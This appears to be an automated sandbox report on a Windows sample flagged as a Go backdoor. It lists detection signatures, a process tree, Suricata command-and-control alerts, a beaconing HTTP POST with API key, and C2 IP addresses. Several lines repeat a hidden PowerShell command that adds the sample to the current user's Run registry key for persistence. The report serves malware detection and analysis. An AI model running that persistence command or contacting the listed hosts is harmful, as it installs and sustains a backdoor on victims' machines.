
Windows Analysis Report
lDO4WBEQyL.exe

Overview

General Information

Sample name: lDO4WBEQyL.exe (renamed because the original name is a hash value)
Original sample name: 43142552e4812e3337226ca1664ed728.exe
Analysis ID: 1583035
MD5: 43142552e4812e3337226ca1664ed728
SHA1: 8c1806c454beb91cc24fec69ca8e26c560790d6e
SHA256: d08de75b76be3596cbcb6fa6f0c39bd41cd876d29cec1108990856989d6ed0f9
Tags: exe, user-abuse_ch

Detection

GO Backdoor
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
AI detected suspicious sample
Found Tor onion address
Machine Learning detection for sample
Suspicious powershell command line found
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • lDO4WBEQyL.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\lDO4WBEQyL.exe" MD5: 43142552E4812E3337226CA1664ED728)
    • powershell.exe (PID: 7940 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • lDO4WBEQyL.exe (PID: 8188 cmdline: "C:\Users\user\Desktop\lDO4WBEQyL.exe" MD5: 43142552E4812E3337226CA1664ED728)
    • powershell.exe (PID: 5232 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • lDO4WBEQyL.exe (PID: 2920 cmdline: "C:\Users\user\Desktop\lDO4WBEQyL.exe" MD5: 43142552E4812E3337226CA1664ED728)
  • cleanup
No configs have been found
Source: Process Memory Space: lDO4WBEQyL.exe PID: 7328, Rule: JoeSecurity_GOBackdoor, Description: Yara detected GO Backdoor, Author: Joe Security
    Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: C:\Users\user\Desktop\lDO4WBEQyL.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7940, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\App
    Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }", CommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lDO4WBEQyL.exe", ParentImage: C:\Users\user\Desktop\lDO4WBEQyL.exe, ParentProcessId: 7328, ParentProcessName: lDO4WBEQyL.exe, ProcessCommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }", ProcessId: 7940, ProcessName: powershell.exe
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-01-01T17:02:44.876620+0100 | 2855536 | 1 | A Network Trojan was detected | 192.168.2.5 | 59227 | 185.157.213.253 | 22132 | TCP
    2025-01-01T17:03:14.288230+0100 | 2855537 | 1 | A Network Trojan was detected | 192.168.2.5 | 59227 | 185.157.213.253 | 22132 | TCP
    2025-01-01T17:03:14.460470+0100 | 2855538 | 1 | A Network Trojan was detected | 185.157.213.253 | 22132 | 192.168.2.5 | 59227 | TCP
    2025-01-01T17:02:44.862102+0100 | 2855539 | 1 | A Network Trojan was detected | 185.157.213.253 | 22132 | 192.168.2.5 | 59227 | TCP


    AV Detection

    Source: lDO4WBEQyL.exe Avira: detected
    Source: lDO4WBEQyL.exe Virustotal: Detection: 23%
    Source: lDO4WBEQyL.exe ReversingLabs: Detection: 36%
    Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
    Source: lDO4WBEQyL.exe Joe Sandbox ML: detected
    Source: lDO4WBEQyL.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: lDO4WBEQyL.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\Admin\Workspace\1803121139\Project\Release\Project.pdb source: lDO4WBEQyL.exe

    Networking

    Source: Network traffic Suricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 185.157.213.253:22132 -> 192.168.2.5:59227
    Source: Network traffic Suricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.5:59227 -> 185.157.213.253:22132
    Source: Network traffic Suricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.5:59227 -> 185.157.213.253:22132
    Source: Network traffic Suricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 185.157.213.253:22132 -> 192.168.2.5:59227
    Source: lDO4WBEQyL.exe, 00000000.00000002.3892279336.0000000000FFA000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: (long Go runtime string-table dump omitted)
    Source: lDO4WBEQyL.exe, 00000000.00000002.3895681931.00000000026C0000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: (long Go runtime string-table dump omitted)
    Source: lDO4WBEQyL.exe, 00000006.00000002.3891955963.0000000000FFA000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: (long Go runtime string-table dump omitted)
    Source: lDO4WBEQyL.exe, 00000006.00000002.3895399995.0000000002B10000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: (long Go runtime string-table dump omitted)
    Source: global traffic TCP traffic: 192.168.2.5:59227 -> 185.157.213.253:22132
    Source: global traffic TCP traffic: 192.168.2.5:59036 -> 162.159.36.2:53
    Source: Joe Sandbox View IP Address: 46.8.232.106
    Source: Joe Sandbox View ASN Name: TVHORADADAES
    Source: unknown DNS traffic detected: query: 198.187.3.20.in-addr.arpa reply code: Name error (3)
    Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2 (reported 4 times)
    Source: unknown TCP traffic detected without corresponding DNS query: 46.8.232.106 (reported 16 times)
    Source: unknown TCP traffic detected without corresponding DNS query: 185.157.213.253 (reported 17 times)
    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
    Source: unknown HTTP traffic detected: POST / HTTP/1.1, Host: 46.8.232.106, User-Agent: Go-http-client/1.1, Content-Length: 178, X-Api-Key: z9AJoadU, Accept-Encoding: gzip, Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 34 05 0d 16 07 23 11 16 02 2f 30 08 0e 22 29 2a 0a 0a 01 10 06 14 54 58 09 54 36 00 07 38 56 52 0b 59 50 24 0e 04 20 1c 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2c 2f 01 09 1b 3e 07 2d 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 0a 1f 16 5e 26 07 23 25 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 26 36 39 41 2d 5e 3a 54 29 04 09 44 45 45 0e 0b 5b 44 53 45 57 5c 5f 52 5b 52 56 5d 0b 52 51 56 51 0a 5d 55 5a 50 51 5d 58 05 08 56 55 59 5a 03 0d 50 51 57 4c 1b, Data Ascii: M*L\K4#/0")*TXT68VRYP$ DEE2MTD,/>-ACL>K]A^&#%DEE1AULV&69A-^:T)DEE[DSEW\_R[RV]RQVQ]UZPQ]XVUYZPQWL
    Source: lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://147.45.196.157
    Source: lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://147.45.196.157185.157.213.253;22132;hdPotrYMtNLspDL2:4JI/ggA/xcm4fqR6ijq.9ju8LHC.jmQ2AXr36Hj2
    Source: lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC40000.00000004.00001000.00020000.00000000.sdmp, lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://147.45.196.157http://46.8.232.106
    Source: lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://38.180.205.164
    Source: lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://46.8.232.106
    Source: lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://46.8.236.61
    Source: lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://91.212.166.9
    Source: lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://91.212.166.91
    Source: powershell.exe, 00000008.00000002.3891780842.0000000002AD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microL
    Source: powershell.exe, 00000004.00000002.2945903417.0000000005A32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3899974175.00000000059C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000008.00000002.3893167157.0000000004AB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000004.00000002.2943211667.00000000049D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3893167157.0000000004961000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000008.00000002.3893167157.0000000004AB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000004.00000002.2943211667.00000000049D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3893167157.0000000004961000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
    Source: powershell.exe, 00000008.00000002.3899974175.00000000059C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000008.00000002.3899974175.00000000059C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000008.00000002.3899974175.00000000059C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000008.00000002.3893167157.0000000004AB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000004.00000002.2945903417.0000000005A32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3899974175.00000000059C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess Stats: CPU usage > 49%
    Source: lDO4WBEQyL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: classification engineClassification label: mal88.troj.evad.winEXE@9/6@1/2
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeFile created: C:\Users\user\AppData\Local\configJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cn2nhad3.o55.ps1Jump to behavior
    Source: lDO4WBEQyL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: lDO4WBEQyL.exeVirustotal: Detection: 23%
    Source: lDO4WBEQyL.exeReversingLabs: Detection: 36%
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeFile read: C:\Users\user\Desktop\lDO4WBEQyL.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\lDO4WBEQyL.exe "C:\Users\user\Desktop\lDO4WBEQyL.exe"
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Users\user\Desktop\lDO4WBEQyL.exe "C:\Users\user\Desktop\lDO4WBEQyL.exe"
    Source: unknownProcess created: C:\Users\user\Desktop\lDO4WBEQyL.exe "C:\Users\user\Desktop\lDO4WBEQyL.exe"
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"Jump to behavior
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"Jump to behavior
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Section loaded: winmm.dll
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Section loaded: powrprof.dll
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Section loaded: umpdc.dll
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Section loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Section loaded: winmm.dll
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Section loaded: powrprof.dll
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Section loaded: umpdc.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: lDO4WBEQyL.exe Static file information: File size 8812032 > 1048576
    Source: lDO4WBEQyL.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x7d8400
    Source: lDO4WBEQyL.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: lDO4WBEQyL.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: lDO4WBEQyL.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: lDO4WBEQyL.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: lDO4WBEQyL.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: lDO4WBEQyL.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: lDO4WBEQyL.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: lDO4WBEQyL.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: C:\Admin\Workspace\1803121139\Project\Release\Project.pdb source: lDO4WBEQyL.exe
    Source: lDO4WBEQyL.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: lDO4WBEQyL.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: lDO4WBEQyL.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: lDO4WBEQyL.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: lDO4WBEQyL.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

    Data Obfuscation

    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"
    Source: lDO4WBEQyL.exe Static PE information: section name: .fptable
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_02D57913 push 8BF07D89h; iretd 4_2_02D57918
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run App
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run App
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
